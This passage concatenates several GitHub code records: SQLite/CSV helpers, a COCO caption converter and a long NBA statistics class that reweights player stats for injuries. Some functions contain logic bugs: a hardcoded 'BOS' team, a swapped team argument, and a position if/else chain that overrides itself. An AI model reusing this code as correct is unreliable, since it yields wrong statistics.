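team = 'A'                               # team being processed
played = {'B', 'X'}                      # all prior opponents of A; 'X' plays in another tier

played_in_tier = played & teams          # {'B'}: prior opponents still in this tier
not_played = teams - (played | {team})   # {'C', 'D'}: fresh opponents, excluding A itself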
If it fails to find non-rematches, it only then will return rematches.\n\t\t'''\n\t\t\n\t\tfor tier in self.data_by_tiers_season_cycle[self.current_cycle]:\n\t\t\tteams = self.data_by_tiers_season_cycle[self.current_cycle][tier]\n\n\t\t\tfor team in teams:\n\t\t\t\tplayed = []\n\n\t\t\t\t# Gotta love O(n^2)\n\t\t\t\tfor cycle in range(1, self.current_cycle+1):\n\t\t\t\t\t_matchups = self.data_by_matchups_season_cycle[cycle]\n\n\t\t\t\t\t# Sometimes teams join late and therefore may not exist in past cycles\n\t\t\t\t\tif team in _matchups:\n\t\t\t\t\t\texisting_matchups = _matchups[team]\n\t\t\t\t\t\tplayed.extend(set(existing_matchups))\n\n\t\t\t\t# a set of played matches \n\t\t\t\tplayed = set(played)\n\n\t\t\t\t# Check if any teams in the selected matchup_cycle\n\t\t\t\t# are not playing in the current cycle of the season.\n\t\t\t\t# In other words, the intersection of the teams in the\n\t\t\t\t# selected matchup cycle and the current cycle of the season\n\t\t\t\tplayed_in_tier = played & set(teams)\n\n\t\t\t\t# exclusive left join on the sets of teams in the current tier,\n\t\t\t\t# played and non full matchups, and the currently selected team\n\t\t\t\tnot_played = set(teams) - (played | set([team]))\n\n\t\t\t\tself.__teams_dictionary__[tier][team] = dict(\n\t\t\t\t\tplayed_in_tier=list(played_in_tier),\n\t\t\t\t\tplayed=list(played),\n\t\t\t\t\tnot_played=list(not_played),\n\t\t\t\t)\n\t\t","repo_name":"vadManuel/dash-league-randomizer","sub_path":"back/DashLeagueFetcher/MatchupRandomizerHelper.py","file_name":"MatchupRandomizerHelper.py","file_ext":"py","file_size_in_byte":4520,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"5391683996","text":"\"\"\"Run this file to start the model\"\"\"\n\nfrom package.parser import Parser\nfrom package.batch_manager import BatchManager\nfrom package.predictors import Predictors\n\nclass Model:\n '''\n Error Correcting Neural Network\n -------------------------------\n The Error-Correcting Neural Network class manages the network \n architecture to accelerate molecular dynamic simulations.\n '''\n\n def __init__(self):\n verbose = True\n test_mode = True\n structure = Parser.get_structure_from_files(verbose=verbose, test_mode=test_mode)\n batcher = BatchManager(structure, verbose=verbose)\n x, y = batcher.get_clean_dataset()\n self.predictors = Predictors(x, y, verbose=verbose, test_mode=test_mode)\n\n def run(self):\n '''This method starts the program.'''\n self.predictors.predict()\n\nif __name__ == \"__main__\":\n model = Model()\n model.run()","repo_name":"rathsidd/Dynamical-Analysis","sub_path":"JustinShaw/ECNN/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"14477917634","text":"import sqlite3\nimport csv\nimport pandas\n\ndef get_domain(url):\n return url.split(\"://\")[1].split(\"/\")[0]\n\n\ndef execSQL(query, connection='db.db'):\n db = sqlite3.connect(connection)\n db.execute(query)\n db.commit()\n db.close()\n\n\ndef create(table, query, connection='db.db'):\n db = sqlite3.connect(connection)\n db.create_function(\"domain_of_url\", 1, get_domain)\n db.execute(\"create table if not exists \" + table + \" as \" + query)\n db.close()\n \n\ndef save(file, table, connection='db.db'):\n with open(f\"{file}.csv\", \"w\", newline='') as file:\n cursor = sqlite3.connect(connection).cursor()\n writer = csv.writer(file)\n data = cursor.execute(\"SELECT * 
FROM \" + table)\n col = []\n for x in data.description:\n col.append(x[0])\n writer.writerow(col)\n\n writer.writerows(data)\n\ndef load(file, table, connection='db.db'):\n db = sqlite3.connect(connection)\n pandas.read_csv(f'{file}').to_sql(name=table, con=db, if_exists='append', index=False)\n db.close()","repo_name":"savin1400914/Pipelines","sub_path":"pipelines/datawork.py","file_name":"datawork.py","file_ext":"py","file_size_in_byte":1041,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38315850224","text":"import json\nimport os\nimport random\n\n\ndef convert_mscoco_to_instruction(input_file, output_file, img_directory):\n with open(input_file, 'r') as f:\n data = json.load(f)\n\n image_dict = {}\n for item in data['annotations']:\n image_id = item['image_id']\n if image_id not in image_dict:\n image_dict[image_id] = []\n image_dict[image_id].append(item['caption'])\n\n converted_data = []\n for image_id, captions in image_dict.items():\n # image_file = os.path.join(img_directory, f\"COCO_{'train' if 'train' in img_directory else 'val'}2017_{str(image_id).zfill(12)}.jpg\")\n image_file = os.path.join(img_directory, f\"{str(image_id).zfill(12)}.jpg\")\n \n instruction = random.choice([\n \"A short image caption:\",\n \"A short image description:\",\n \"A photo of\",\n \"An image that shows\",\n \"Write a short description for the image.\",\n \"Write a description for the photo.\",\n \"Provide a description of what is presented in the photo.\",\n \"Briefly describe the content of the image.\",\n \"Can you briefly explain what you see in the image?\",\n \"Could you use a few words to describe what you perceive in the photo?\",\n \"Please provide a short depiction of the picture.\",\n \"Using language, provide a short account of the image.\",\n \"Use a few words to illustrate what is happening in the picture.\",\n ])\n # caption = max(captions, key=len).strip().capitalize()\n for caption in captions:\n caption = caption.strip().capitalize()\n if caption[-1] not in ['.', '?', '!']:\n caption += '.'\n converted_item = {\n \"input\": f\"{instruction}/cpfs/user/chendelong/downloads/mscoco_2017/{image_file}\",\n \"output\": caption,\n }\n converted_data.append(converted_item)\n print(len(converted_data))\n\n random.shuffle(converted_data)\n with open(output_file, 'w') as f:\n json.dump(converted_data, f, indent=4)\n\n\nif __name__ == \"__main__\":\n os.makedirs('converted_datasets/coco_2017_captions', exist_ok=True)\n convert_mscoco_to_instruction(\n \"/cpfs/user/chendelong/downloads/mscoco_2017/annotations/captions_train2017.json\",\n \"converted_datasets/coco_2017_captions/coco_2017_captions_train.json\",\n \"train2017\"\n )\n convert_mscoco_to_instruction(\n \"/cpfs/user/chendelong/downloads/mscoco_2017/annotations/captions_val2017.json\",\n \"converted_datasets/coco_2017_captions/coco_2017_captions_val.json\",\n \"val2017\"\n )\n","repo_name":"ChenDelong1999/instruct-flamingo","sub_path":"instruction_dataset/mscoco_to_instruction.py","file_name":"mscoco_to_instruction.py","file_ext":"py","file_size_in_byte":2689,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"53"} +{"seq_id":"4023601164","text":"\"\"\"Year class.\"\"\"\nimport pandas as pd\nimport datetime\nfrom nba_api.stats import endpoints\nfrom nba_api.stats.library.parameters import SeasonType, SeasonTypePlayoffs\nfrom objects.helper import nba_team_ids, scrape_current_nba_injuries\nimport time\nimport math\nimport numpy as 
np\n\n\nclass year:\n \"\"\"Create year class.\"\"\"\n\n def __init__(self, year):\n \"\"\"Initialize year class.\"\"\"\n self.year = year\n next_year_abb = str(self.year - 1999)\n if len(next_year_abb) == 1:\n next_year_abb = \"0\" + next_year_abb\n self.season = str(self.year) + \"-\" + next_year_abb\n self.game_data_cache = pd.DataFrame()\n self.playoff_game_data_cache = pd.DataFrame()\n self.playoff_boxes_cache = pd.DataFrame()\n self.regular_boxes_cache = pd.DataFrame()\n self.injured_cache = dict()\n self.roster_info_cache = pd.DataFrame()\n self.regular_boxes_cache_only_played = pd.DataFrame()\n self.update_timestamp_game_data = datetime.datetime.now()\n self.update_timestamp_regular_boxes = datetime.datetime.now()\n self.update_timestamp_playoff_game_data = datetime.datetime.now()\n self.update_timestamp_playoff_boxes = datetime.datetime.now()\n self.update_timestamp_sit_or_injured_playoff = datetime.datetime.now()\n self.update_timestamp_roster_info = datetime.datetime.now()\n print(f\"-->Loading data for {self.season}...\")\n loader_1 = self.roster_info.copy()\n loader_2 = self.game_data.copy()\n loader_3 = self.regular_boxes.copy()\n loader_4 = self.playoff_game_data.copy()\n loader_5 = self.playoff_boxes.copy()\n loader_6 = self.sit_or_injured_playoff.copy()\n\n @property\n def roster_info(self):\n \"\"\"Define roster info.\"\"\"\n if (self.roster_info_cache.empty) or (\n (datetime.datetime.now().year in [self.year, self.year + 1])\n and (\n datetime.datetime.now() - self.update_timestamp_roster_info\n > datetime.timedelta(seconds=3600)\n )\n ) and (self.playoff_game_data.shape[0] == 0):\n print(\"---->Loading or updating player info...\")\n all_players = []\n for team_id in self.regular_boxes.TEAM_ID.unique():\n roster = endpoints.commonteamroster.CommonTeamRoster(\n team_id=team_id, season=self.season\n ).get_data_frames()[0]\n all_players.append(roster)\n time.sleep(2)\n all_players = pd.concat(all_players)\n self.roster_info_cache = all_players[\n [\"TeamID\", \"PLAYER_ID\", \"POSITION\"]\n ].rename({\"TeamID\": \"TEAM_ID\"}, axis=1)\n self.update_timestamp_roster_info = datetime.datetime.now()\n return self.roster_info_cache\n\n @property\n def game_data(self) -> None:\n \"\"\"Set game data in object cache in long format.\"\"\"\n if self.game_data_cache.shape[0] == 0:\n print(\n \"---->Loading regular season game data for this year for the first time...\"\n )\n all_games = (\n endpoints.leaguegamefinder.LeagueGameFinder(\n season_type_nullable=SeasonType.regular, season_nullable=self.season\n )\n .get_data_frames()[0]\n .query(\"TEAM_ID in @nba_team_ids\")\n )\n time.sleep(2)\n elif (datetime.datetime.now().year in [self.year, self.year + 1]) and (\n datetime.datetime.now() - self.update_timestamp_game_data\n > datetime.timedelta(seconds=3600)\n ) and (self.playoff_game_data.shape[0] == 0):\n print(\"Updating resular season game data.\")\n all_games = (\n endpoints.leaguegamefinder.LeagueGameFinder(\n season_type_nullable=SeasonType.regular, season_nullable=self.season\n ).get_data_frames()[0].query(\"TEAM_ID in @nba_team_ids\").query(\"WL.notna()\")\n )\n self.update_timestamp_game_data = datetime.datetime.now()\n time.sleep(2)\n else:\n return self.game_data_cache\n all_games[\"HOME_AWAY\"] = [\n \"H\" if x == 1 else \"A\" for x in all_games.MATCHUP.str.contains(\"vs\")\n ]\n all_games = all_games[\n [\n \"GAME_ID\",\n \"GAME_DATE\",\n \"HOME_AWAY\",\n \"TEAM_ID\",\n \"TEAM_ABBREVIATION\",\n \"PTS\",\n \"FGM\",\n \"FGA\",\n \"FG_PCT\",\n \"FG3M\",\n \"FG3A\",\n 
\"FG3_PCT\",\n \"FTM\",\n \"FTA\",\n \"FT_PCT\",\n \"OREB\",\n \"DREB\",\n \"REB\",\n \"AST\",\n \"STL\",\n \"BLK\",\n \"TOV\",\n \"PF\",\n \"PLUS_MINUS\",\n ]\n ].copy()\n all_games = all_games.pivot(index=\"GAME_ID\", columns=\"HOME_AWAY\").reset_index()\n all_games.columns = all_games.columns.map(lambda x: \"_\".join(x))\n all_games[\"OUTCOME\"] = [\n 0 if PLUS_MINUS_H < 0 else 1 for PLUS_MINUS_H in all_games.PLUS_MINUS_H\n ]\n all_games = (\n all_games.rename(\n columns={\"GAME_DATE_H\": \"GAME_DATE\", \"GAME_ID_\": \"GAME_ID\"}\n )\n .drop([\"GAME_DATE_A\"], axis=1)\n .copy()\n )\n self.game_data_cache = all_games.query(\n \"TEAM_ID_H in @nba_team_ids & TEAM_ID_A in @nba_team_ids\"\n )\n return self.game_data_cache\n\n @property\n def regular_boxes(self) -> None:\n \"\"\"Set regular season player box summaries.\"\"\"\n if self.regular_boxes_cache.shape[0] == 0:\n print(\n \"---->Loading regular season player box data for this year for the first time...\"\n )\n self.regular_boxes_cache = (\n endpoints.PlayerGameLogs(\n season_type_nullable=SeasonType.regular, season_nullable=self.season\n )\n .get_data_frames()[0]\n .query(\"TEAM_ID in @nba_team_ids\")\n )\n time.sleep(2)\n elif ((datetime.datetime.now().year in [self.year, self.year + 1]) and (\n datetime.datetime.now() - self.update_timestamp_regular_boxes\n > datetime.timedelta(seconds=3600)\n )) and (self.playoff_game_data.shape[0] == 0):\n print(\"---->Updating regular season box data...\")\n self.regular_boxes_cache = (\n endpoints.PlayerGameLogs(\n season_type_nullable=SeasonType.regular, season_nullable=self.season\n )\n .get_data_frames()[0]\n .query(\"TEAM_ID in @nba_team_ids\")\n )\n self.update_timestamp_regular_boxes = datetime.datetime.now()\n time.sleep(2)\n return self.regular_boxes_cache\n\n @property\n def regular_boxes_summary(self):\n \"\"\"Get box scores summary.\"\"\"\n regular_boxes = self.regular_boxes.copy()\n regular_boxes_summary = (\n regular_boxes[\n [\n \"TEAM_ID\",\n \"PLAYER_ID\",\n \"MIN\",\n \"PTS\",\n \"FGM\",\n \"FGA\",\n \"FG_PCT\",\n \"FG3M\",\n \"FG3A\",\n \"FG3_PCT\",\n \"FTM\",\n \"FTA\",\n \"FT_PCT\",\n \"OREB\",\n \"DREB\",\n \"REB\",\n \"AST\",\n \"STL\",\n \"BLK\",\n \"TOV\",\n \"PF\",\n \"PLUS_MINUS\",\n ]\n ]\n .fillna(0)\n .groupby([\"PLAYER_ID\", \"TEAM_ID\"])\n .agg([\"mean\"])\n .reset_index()\n )\n regular_boxes_summary.columns = regular_boxes_summary.columns.map(\n lambda x: \"_\".join(x)\n )\n regular_boxes_summary = regular_boxes_summary.rename(\n columns={\"PLAYER_ID_\": \"PLAYER_ID\", \"TEAM_ID_\": \"TEAM_ID\"}\n ).copy()\n return regular_boxes_summary\n\n @property\n def playoff_game_data(self) -> None:\n \"\"\"Set playoff game data in object cache in wide format.\"\"\"\n if self.playoff_game_data_cache.shape[0] == 0:\n print(\"---->Loading playoff game data for this year for the first time...\")\n all_games = (\n endpoints.leaguegamefinder.LeagueGameFinder(\n season_type_nullable=SeasonTypePlayoffs.playoffs,\n season_nullable=self.season,\n ).get_data_frames()[0].query(\"TEAM_ID in @nba_team_ids\").query(\"WL.notna()\")\n )\n time.sleep(2)\n elif (datetime.datetime.now().year in [self.year, self.year + 1]) and (\n datetime.datetime.now() - self.update_timestamp_playoff_game_data\n > datetime.timedelta(seconds=3600)\n ):\n print(\"Updating playoff game data.\")\n all_games = (\n endpoints.leaguegamefinder.LeagueGameFinder(\n season_type_nullable=SeasonTypePlayoffs.playoffs,\n season_nullable=self.season,\n )\n .get_data_frames()[0]\n .query(\"TEAM_ID in @nba_team_ids\")\n )\n 
self.update_timestamp_playoff_game_data = datetime.datetime.now()\n time.sleep(2)\n else:\n return self.playoff_game_data_cache\n all_games[\"HOME_AWAY\"] = [\n \"H\" if x == 1 else \"A\" for x in all_games.MATCHUP.str.contains(\"vs\")\n ]\n all_games = all_games[\n [\n \"GAME_ID\",\n \"GAME_DATE\",\n \"HOME_AWAY\",\n \"TEAM_ID\",\n \"TEAM_ABBREVIATION\",\n \"PTS\",\n \"FGM\",\n \"FGA\",\n \"FG_PCT\",\n \"FG3M\",\n \"FG3A\",\n \"FG3_PCT\",\n \"FTM\",\n \"FTA\",\n \"FT_PCT\",\n \"OREB\",\n \"DREB\",\n \"REB\",\n \"AST\",\n \"STL\",\n \"BLK\",\n \"TOV\",\n \"PF\",\n \"PLUS_MINUS\",\n ]\n ].copy()\n all_games = all_games.pivot(index=\"GAME_ID\", columns=\"HOME_AWAY\").reset_index()\n all_games.columns = all_games.columns.map(lambda x: \"_\".join(x))\n all_games[\"OUTCOME\"] = [\n 0 if PLUS_MINUS_H < 0 else 1 for PLUS_MINUS_H in all_games.PLUS_MINUS_H\n ]\n all_games = (\n all_games.rename(\n columns={\"GAME_DATE_H\": \"GAME_DATE\", \"GAME_ID_\": \"GAME_ID\"}\n )\n .drop([\"GAME_DATE_A\"], axis=1)\n .copy()\n )\n self.playoff_game_data_cache = all_games.query(\n \"TEAM_ID_H in @nba_team_ids & TEAM_ID_A in @nba_team_ids\"\n )\n return self.playoff_game_data_cache\n\n @property\n def playoff_boxes(self):\n \"\"\"Load player boxes for all playoff games.\"\"\"\n if self.playoff_boxes_cache.shape[0] == 0:\n print(\n \"---->Loading playoff player box data for this year for the first time...\"\n )\n post_boxes = (\n endpoints.PlayerGameLogs(\n season_type_nullable=SeasonTypePlayoffs.playoffs,\n season_nullable=self.season,\n )\n .get_data_frames()[0]\n .query(\"TEAM_ID in @nba_team_ids\")\n )\n time.sleep(2)\n elif (datetime.datetime.now().year in [self.year, self.year + 1]) and (\n datetime.datetime.now() - self.update_timestamp_playoff_boxes\n > datetime.timedelta(seconds=3600)\n ):\n print(\"---->Updating playoff box season game data.\")\n post_boxes = (\n endpoints.PlayerGameLogs(\n season_type_nullable=SeasonTypePlayoffs.playoffs,\n season_nullable=self.season,\n )\n .get_data_frames()[0]\n .query(\"TEAM_ID in @nba_team_ids\")\n )\n self.update_timestamp_playoff_boxes = datetime.datetime.now()\n time.sleep(2)\n else:\n return self.playoff_boxes_cache\n playoff_boxes_cache = post_boxes[\n [\n \"GAME_ID\",\n \"TEAM_ID\",\n \"PLAYER_ID\",\n \"GAME_DATE\",\n \"MIN\",\n \"PTS\",\n \"FGM\",\n \"FGA\",\n \"FG_PCT\",\n \"FG3M\",\n \"FG3A\",\n \"FG3_PCT\",\n \"FTM\",\n \"FTA\",\n \"FT_PCT\",\n \"OREB\",\n \"DREB\",\n \"REB\",\n \"AST\",\n \"STL\",\n \"BLK\",\n \"TOV\",\n \"PF\",\n \"PLUS_MINUS\",\n ]\n ]\n check_play_time_dist = self.regular_boxes_summary.copy()\n check_play_time_dist[\n \"Regular_Season_Play_Time_Rank\"\n ] = check_play_time_dist.groupby(\"TEAM_ID\").MIN_mean.rank(ascending=False)\n player_team_rank = check_play_time_dist[\n [\"PLAYER_ID\", \"Regular_Season_Play_Time_Rank\"]\n ]\n self.playoff_boxes_cache = playoff_boxes_cache.merge(\n player_team_rank, how=\"left\", on=\"PLAYER_ID\"\n )\n return self.playoff_boxes_cache\n\n def get_playoff_results_up_to_date(self, date: str): # Input string as \"%Y-%m-%d\"\n \"\"\"Get current playoff results.\"\"\"\n return self.playoff_game_data.query(\"GAME_DATE < @date\")\n\n def get_team_rosters_from_regular_season(self):\n \"\"\"Organize dictionary where keys are team_ids and items are lists of player_ids.\"\"\"\n rosters_df = self.roster_info[[\"PLAYER_ID\", \"TEAM_ID\"]].drop_duplicates()\n rosters_dict = {\n team: players.tolist()\n for team, players in rosters_df.groupby(\"TEAM_ID\")[\"PLAYER_ID\"]\n }\n return rosters_dict\n\n def 
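# --- Editor's note: illustrative sketch, not one of the dataset records. ---
# Each cached property in the year class follows the same refresh rule:
# refetch when the cache is empty, or when the object covers the current
# season and the last update is over an hour old. The guard in isolation,
# with a stand-in fetch() callable:
import datetime

class HourlyCache:
    def __init__(self, fetch):
        self._fetch = fetch
        self._value = None
        self._stamp = datetime.datetime.min

    def get(self, is_current_season: bool):
        age = datetime.datetime.now() - self._stamp
        if self._value is None or (
            is_current_season and age > datetime.timedelta(seconds=3600)
        ):
            self._value = self._fetch()
            self._stamp = datetime.datetime.now()
        return self._value

cache = HourlyCache(fetch=lambda: "fresh data")
print(cache.get(is_current_season=True))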
get_players_played_in_each_playoff_game(self):\n \"\"\"Organize nested dictionary where outer key is team_id inner key is game_date and item is list of player_ids.\"\"\"\n played = self.playoff_boxes[[\"TEAM_ID\", \"PLAYER_ID\", \"GAME_ID\"]]\n nested_dict = {team: dict() for team in played.TEAM_ID.unique()}\n for team in nested_dict.keys():\n played_team = played.query(\"TEAM_ID == @team\")\n nested_dict[team].update(\n {\n game_id: players.tolist()\n for game_id, players in played_team.groupby(\"GAME_ID\")[\"PLAYER_ID\"]\n }\n )\n return nested_dict\n\n @property\n def sit_or_injured_playoff(self):\n \"\"\"Gets whether players sat on each playoff game date for year in nested dict.\"\"\"\n if len(self.injured_cache) == 0 or (\n (datetime.datetime.now().year in [self.year, self.year + 1])\n and (\n datetime.datetime.now() - self.update_timestamp_sit_or_injured_playoff\n > datetime.timedelta(seconds=3600)\n )\n ):\n roster_dict = self.get_team_rosters_from_regular_season()\n played_dict = self.get_players_played_in_each_playoff_game()\n injury_dict = {\n team: {\n game_id: [\n player\n for player in roster_dict[team]\n if player not in played_dict.get(team, {}).get(game_id, [])\n ]\n for game_id in played_dict.get(team, {}).keys()\n }\n for team in roster_dict.keys()\n }\n self.injured_cache = injury_dict\n self.update_timestamp_sit_or_injured_playoff = datetime.datetime.now()\n return self.injured_cache\n\n def reweight_replacements_for_missing_player(\n self, possible_replacement_player_ids, remove_injured, injured_player_id\n ):\n \"\"\"Reweights replacement players for ONE missing player.\"\"\"\n if len(possible_replacement_player_ids) == 0:\n raise KeyError(\"No valid replacements.\")\n team_id = remove_injured.reset_index(drop=1).TEAM_ID[0]\n possile_replacement_box_summary = self.regular_boxes_summary.query(\n \"(PLAYER_ID in @possible_replacement_player_ids) & (TEAM_ID == @team_id)\"\n ).sort_values(by=\"MIN_mean\", ascending=False)\n min_diff = (\n self.regular_boxes_summary.query(\"PLAYER_ID == @injured_player_id\")\n .reset_index(drop=0)\n .MIN_mean[0]\n )\n max_minutes = (\n min_diff.copy()\n ) # set max minutes to number of minutes adjusted player was playing and incriment up if needed\n if min_diff <= 0:\n return pd.DataFrame(columns=[\"PLAYER_ID\"])\n while (min_diff > 0) & (max_minutes <= 48):\n replacement_df = []\n for index, row in possile_replacement_box_summary.iterrows():\n if (min_diff > 0) & (row.MIN_mean < max_minutes):\n min_diff = min_diff - (max_minutes - row.MIN_mean)\n if min_diff < 0:\n player_min_new = max_minutes + min_diff\n else:\n player_min_new = max_minutes\n prop_orig_time = player_min_new / row.MIN_mean\n updated_stats = (\n pd.DataFrame(row)\n .T.drop(\n [\n \"PLAYER_ID\",\n \"TEAM_ID\",\n \"FG_PCT_mean\",\n \"FG3_PCT_mean\",\n \"FT_PCT_mean\",\n \"PLUS_MINUS_mean\",\n ],\n axis=1,\n )\n .mul(prop_orig_time, axis=0)\n .copy()\n )\n updated_stats[\"FG_PCT_mean\"] = (\n updated_stats.FGM_mean / updated_stats.FGA_mean\n )\n updated_stats[\"FG3_PCT_mean\"] = (\n updated_stats.FG3M_mean / updated_stats.FG3A_mean\n )\n updated_stats[\"FT_PCT_mean\"] = (\n updated_stats.FTM_mean / updated_stats.FTA_mean\n )\n updated_stats[\"PLAYER_ID\"] = row.PLAYER_ID\n updated_stats[\"TEAM_ID\"] = row.TEAM_ID\n replacement_df.append(updated_stats)\n max_minutes += 1\n replacement_df = pd.concat(replacement_df)\n if min_diff > 0:\n raise KeyError(\n f\"Warning: Not enough eligible players on bench to account for all injuries with full 40 minutes of play for injury_id 
{injured_player_id}.\"\n )\n return replacement_df\n\n def get_team_record(self, team_abb):\n \"\"\"Get win loss record.\"\"\"\n home_games = np.array(\n self.game_data.query(\"TEAM_ABBREVIATION_H == 'BOS'\").OUTCOME\n )\n away_games = 1 - np.array(\n self.game_data.query(\"TEAM_ABBREVIATION_A == 'BOS'\").OUTCOME\n )\n return np.mean(np.append(home_games, away_games))\n\n def reweight_stats(\n self, team_id, game_id, avg_minutes_played_cutoff, games_ahead_of_today\n ):\n \"\"\"Get injury reweighted predicted stats.\"\"\"\n if game_id == 0:\n injured = [\n player_id\n for player_id in scrape_current_nba_injuries(\n games_ahead_of_today\n ).PLAYER_ID\n if not math.isnan(player_id)\n ]\n else:\n injured = self.sit_or_injured_playoff[team_id][game_id]\n on_roster_still = self.get_team_rosters_from_regular_season()[team_id]\n # Only considered injury needing replacement if average minutes is greater than 30\n injured = (\n self.regular_boxes_summary.query(\n \"(TEAM_ID == @team_id) & (PLAYER_ID in @injured) & (MIN_mean > 25) & (PLAYER_ID in @on_roster_still)\"\n )\n .reset_index(drop=1)\n .PLAYER_ID.tolist()\n ) # remove players below injury adjustment cutoff (we dont care if a player that doesnt play is injured)\n remove_injured = self.regular_boxes_summary.query(\n \"(PLAYER_ID not in @injured) & (PLAYER_ID in @on_roster_still) & (TEAM_ID == @team_id)\"\n )\n for injured_player_id in injured:\n try:\n injured_pos = (\n self.roster_info.query(\"PLAYER_ID == @injured_player_id\")\n .reset_index(drop=1)\n .POSITION[0]\n )\n except KeyError:\n continue # player is no longer on roster\n # Possible Positions: ['G-F', 'F-G', 'G', 'C', 'F-C', 'F', 'C-F']\n if (injured_pos == \"G-F\") or (injured_pos == \"F-G\"):\n possible_replacement_player_ids = (\n self.roster_info.query(\n \"(PLAYER_ID in @on_roster_still) & ('G' in POSITION | 'F' in POSITION) & (PLAYER_ID not in @injured)\"\n )\n .reset_index(drop=1)\n .PLAYER_ID.tolist()\n )\n if injured_pos == \"G\":\n possible_replacement_player_ids = (\n self.roster_info.query(\n \"(PLAYER_ID in @on_roster_still) & ('G' in POSITION) & (PLAYER_ID not in @injured)\"\n )\n .reset_index(drop=1)\n .PLAYER_ID.tolist()\n )\n if injured_pos == \"C\":\n possible_replacement_player_ids = (\n self.roster_info.query(\n \"(PLAYER_ID in @on_roster_still) & ('C' in POSITION) & (PLAYER_ID not in @injured)\"\n )\n .reset_index(drop=1)\n .PLAYER_ID.tolist()\n )\n if (injured_pos == \"F-C\") or (injured_pos == \"C-F\"):\n possible_replacement_player_ids = (\n self.roster_info.query(\n \"(PLAYER_ID in @on_roster_still) & ('C' in POSITION | 'F' in POSITION) & (PLAYER_ID not in @injured)\"\n )\n .reset_index(drop=1)\n .PLAYER_ID.tolist()\n )\n if injured_pos == \"F\":\n possible_replacement_player_ids = (\n self.roster_info.query(\n \"(PLAYER_ID in @on_roster_still) & ('F' in POSITION) & (PLAYER_ID not in @injured)\"\n )\n .reset_index(drop=1)\n .PLAYER_ID.tolist()\n )\n else:\n possible_replacement_player_ids = (\n self.roster_info.query(\n \"(PLAYER_ID in @on_roster_still) & (PLAYER_ID not in @injured)\"\n )\n .reset_index(drop=1)\n .PLAYER_ID.tolist()\n )\n try:\n replacement_df = self.reweight_replacements_for_missing_player(\n possible_replacement_player_ids=possible_replacement_player_ids,\n remove_injured=remove_injured,\n injured_player_id=injured_player_id,\n )\n except KeyError: # if none left in position move to other positions\n possible_replacement_player_ids = (\n self.roster_info.query(\n \"(PLAYER_ID in @on_roster_still) & (PLAYER_ID not in @injured)\"\n )\n 
.reset_index(drop=1)\n .PLAYER_ID.tolist()\n )\n replacement_df = self.reweight_replacements_for_missing_player(\n possible_replacement_player_ids=possible_replacement_player_ids,\n remove_injured=remove_injured,\n injured_player_id=injured_player_id,\n )\n replaced_player_ids = replacement_df.PLAYER_ID.tolist()\n remove_injured = pd.concat(\n [\n remove_injured.query(\"PLAYER_ID not in @replaced_player_ids\"),\n replacement_df,\n ]\n )\n return remove_injured.drop([\"TEAM_ID\", \"PLUS_MINUS_mean\"], axis=1)\n\n def get_regular_season_summary_stats_unadjusted(self, team_id):\n \"\"\"Get team regular season summary statistics for all teams.\"\"\"\n on_roster_still = self.get_team_rosters_from_regular_season()[team_id]\n players_summary = self.regular_boxes_summary.query(\n \"(PLAYER_ID in @on_roster_still) & (TEAM_ID == @team_id)\"\n )\n return players_summary.drop([\"TEAM_ID\", \"PLUS_MINUS_mean\"], axis=1)\n\n def get_home_win_percentage(self, team_id):\n \"\"\"Get home win percentage for team.\"\"\"\n return self.game_data.query(\"TEAM_ID_H == @team_id\").OUTCOME.mean()\n\n def get_away_win_percentage(self, team_id):\n \"\"\"Get away win percentage for team.\"\"\"\n return 1 - self.game_data.query(\"TEAM_ID_A == @team_id\").OUTCOME.mean()\n\n def feature_creator(\n self,\n home_team,\n away_team,\n game_id,\n injury_adjusted: bool,\n avg_minutes_played_cutoff,\n games_ahead_of_today,\n ):\n \"\"\"Define feature creator.\"\"\"\n if injury_adjusted:\n home_reweighted = (\n self.reweight_stats(\n team_id=home_team,\n game_id=game_id,\n avg_minutes_played_cutoff=avg_minutes_played_cutoff,\n games_ahead_of_today=games_ahead_of_today,\n )\n .query(\"MIN_mean >= @avg_minutes_played_cutoff\")\n .drop([\"MIN_mean\", \"PLAYER_ID\"], axis=1)\n .add_suffix(\"_H\")\n .rename(columns=lambda x: x.replace(\"_mean\", \"\"))\n )\n depth_at_cutoff = home_reweighted.shape[0]\n home_reweighted = (\n home_reweighted.agg([\"mean\", \"median\", \"max\"]).stack().to_frame().T\n )\n home_reweighted.columns = [\n \"_\".join(map(str, c)) for c in home_reweighted.columns\n ]\n home_reweighted[\"depth_at_cutoff_H\"] = depth_at_cutoff\n home_reweighted[\"home_win_percentage\"] = self.get_home_win_percentage(\n away_team\n )\n away_reweighted = (\n self.reweight_stats(\n team_id=away_team,\n game_id=game_id,\n avg_minutes_played_cutoff=avg_minutes_played_cutoff,\n games_ahead_of_today=games_ahead_of_today,\n )\n .query(\"MIN_mean >= @avg_minutes_played_cutoff\")\n .drop([\"MIN_mean\", \"PLAYER_ID\"], axis=1)\n .add_suffix(\"_A\")\n .rename(columns=lambda x: x.replace(\"_mean\", \"\"))\n )\n depth_at_cutoff = away_reweighted.shape[0]\n away_reweighted = (\n away_reweighted.agg([\"mean\", \"median\", \"max\"]).stack().to_frame().T\n )\n away_reweighted.columns = [\n \"_\".join(map(str, c)) for c in away_reweighted.columns\n ]\n away_reweighted[\"depth_at_cutoff_A\"] = depth_at_cutoff\n away_reweighted[\"road_win_percentage\"] = self.get_away_win_percentage(\n away_team\n )\n else:\n home_reweighted = (\n self.get_regular_season_summary_stats_unadjusted(team_id=home_team)\n .query(\"MIN_mean >= @avg_minutes_played_cutoff\")\n .drop([\"MIN_mean\", \"PLAYER_ID\"], axis=1)\n .add_suffix(\"_H\")\n .rename(columns=lambda x: x.replace(\"_mean\", \"\"))\n )\n depth_at_cutoff = home_reweighted.shape[0]\n home_reweighted = (\n home_reweighted.agg([\"mean\", \"median\", \"max\"]).stack().to_frame().T\n )\n home_reweighted.columns = [\n \"_\".join(map(str, c)) for c in home_reweighted.columns\n ]\n 
